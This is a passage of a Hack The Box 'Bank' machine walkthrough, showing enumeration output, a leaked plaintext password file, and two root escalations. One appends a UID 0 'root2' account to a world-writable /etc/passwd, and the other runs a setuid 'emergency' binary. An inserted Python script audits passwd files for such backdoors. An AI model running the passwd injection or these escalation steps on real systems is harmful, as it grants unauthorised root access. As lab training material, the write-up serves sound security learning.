drwxr-xr-x 22 root  root  4.0K Dec 24  2017 ..
drwxr-xr-x  3 chris chris 4.0K Jun 14  2017 chris

[-] Files not owned by user but writable by group:
-rw-rw-rw- 1 root root 1252 May 28  2017 /etc/passwd

[-] Root is allowed to login via SSH:
PermitRootLogin yes

[-] MYSQL version:
mysql  Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3

[-] Apache version:
Server version: Apache/2.4.7 (Ubuntu)
Server built:   May  9 2017 16:13:38

[-] Can we read/write sensitive files:
-rw-rw-rw- 1 root root   1252 May 28  2017 /etc/passwd
-rw-r--r-- 1 root root    707 May 28  2017 /etc/group
-rw-r--r-- 1 root root    665 Feb 20  2014 /etc/profile
-rw-r----- 1 root shadow  895 Jun 14  2017 /etc/shadow

[-] SUID files:
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency

File /var/www/bank/bankreports.txt

I missed it because I didn't add the txt extension to my web enumeration :(. In this file, the user and password are in clear text too.

root@kali:~/HTB/Machines/Bank# curl bank.htb/bankreports.txt
+=================+
| HTB Bank Report |
+=================+

===Users===
Full Name: Christos Christopoulos
Email: chris@bank.htb
Password: !##HTBB4nkP4ssw0rd!##
CreditCards: 2
Transactions: 8
Balance: 1.337$

Permissions on /home directories are lax

As we have already seen, thanks to the lax permissions we do not need to become the user chris to capture the user flag.

/etc/passwd is writable

This gives an easy way to escalate privileges.

/var/htb/bin/emergency

This file runs as root (setuid) and seems interesting.

www-data@bank:/tmp$ file /var/htb/bin/emergency
file /var/htb/bin/emergency
/var/htb/bin/emergency: setuid ELF 32-bit LSB  shared object, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=1fff1896e5f8db5be4db7b7ebab6ee176129b399, stripped

This file could also have been found by searching for SUID files manually.

www-data@bank:/tmp$ find / -perm -4000 -exec ls -l {} \; 2>/dev/null
find / -perm -4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 112204 Jun 14  2017 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21  2013 /usr/bin/at
-rwsr-xr-x 1 root root 35916 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45420 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 44620 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 root root 30984 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 66284 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 156708 May 29  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24  2016 /usr/sbin/uuidd
-rwsr-xr-- 1 root dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 root root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 root root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 root root 35300 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 root root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 root root 67704 Nov 24  2016 /bin/umount

Root Flag

/etc/passwd

www-data@bank:/tmp$ echo "root2:`openssl passwd hello`:0:0:root:/root:/bin/bash" >> /etc/passwd

A new line for the user root2, with the password hello, is appended.
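The LinEnum finding above (a world-writable /etc/passwd) and the root2 line just appended are exactly what a host audit should catch. This added example (not from the original page) parses a passwd image together with its mode bits and reports both conditions; the file content and mode are constructed, and the hash is a placeholder rather than real openssl passwd output.

```python
"""Audit an /etc/passwd image for weak mode bits and rogue UID 0 accounts.
Added example, not part of the original write-up; sample data is constructed."""
import stat


def parse_passwd(text: str):
    """Yield one dict per passwd line; malformed lines are flagged, not skipped."""
    for n, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            yield {"line": n, "malformed": line}
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        yield {"line": n, "name": name, "pw": pw, "uid": uid,
               "gid": gid, "home": home, "shell": shell}


def audit_passwd(text: str, mode: int):
    """Return a list of findings for the file content and its st_mode."""
    findings = []
    # Mode bits: on this box LinEnum showed -rw-rw-rw-, i.e. anyone can append.
    if mode & stat.S_IWOTH:
        findings.append("/etc/passwd is world-writable (%o)" % stat.S_IMODE(mode))
    elif mode & stat.S_IWGRP:
        findings.append("/etc/passwd is group-writable (%o)" % stat.S_IMODE(mode))
    for e in parse_passwd(text):
        if "malformed" in e:
            findings.append(f"line {e['line']}: malformed entry")
            continue
        # Any second UID 0 account is a backdoor root login.
        if e["uid"] == "0" and e["name"] != "root":
            findings.append(f"line {e['line']}: extra UID 0 account '{e['name']}'")
        # Real hashes belong in /etc/shadow; passwd should only hold x/*/!.
        if e["pw"] == "":
            findings.append(f"line {e['line']}: empty password field for '{e['name']}'")
        elif e["pw"] not in ("x", "*", "!", "!!"):
            findings.append(f"line {e['line']}: password hash stored in passwd for '{e['name']}'")
    return findings


# Constructed content: a normal file plus the root2 line from the write-up
# (hash replaced by a placeholder).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
chris:x:1000:1000:chris,,,:/home/chris:/bin/bash
root2:$1$PLACEHOLDER:0:0:root:/root:/bin/bash
"""
SAMPLE_MODE = 0o100666   # -rw-rw-rw-, as LinEnum reported on this box

if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD, SAMPLE_MODE):
        print("FINDING:", finding)
```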

root@kali:~/HTB/Machines/Bank# ssh root2@bank.htb
The authenticity of host 'bank.htb (10.10.10.29)' can't be established.
ECDSA key fingerprint is SHA256:FzRjUWEJH7r9hunMHbWe5kA2nfM0lnrdGyDQQ9uXg68.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'bank.htb' (ECDSA) to the list of known hosts.
root2@bank.htb's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-79-generic i686)

System information as of Fri Nov 22 02:39:54 EET 2019
  System load:  0.16              Processes:        84
  Usage of /:   7.4% of 28.42GB   Users logged in:  0
  Memory usage: 4%                Swap usage:       0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Jun 16 07:44:56 2017
root@bank:~# whoami
root
root@bank:~# cat /root/root.txt
<ROOT FLAG>

/var/htb/bin/emergency

This alternative way uses the emergency program found before.

www-data@bank:/tmp$ whoami
whoami
www-data
www-data@bank:/tmp$ /var/htb/bin/emergency
/var/htb/bin/emergency
# whoami
whoami
root
# cat /root/root.txt
cat /root/root.txt
<ROOT FLAG>

Daniel Simao 18:03, 21 November 2019 (EST)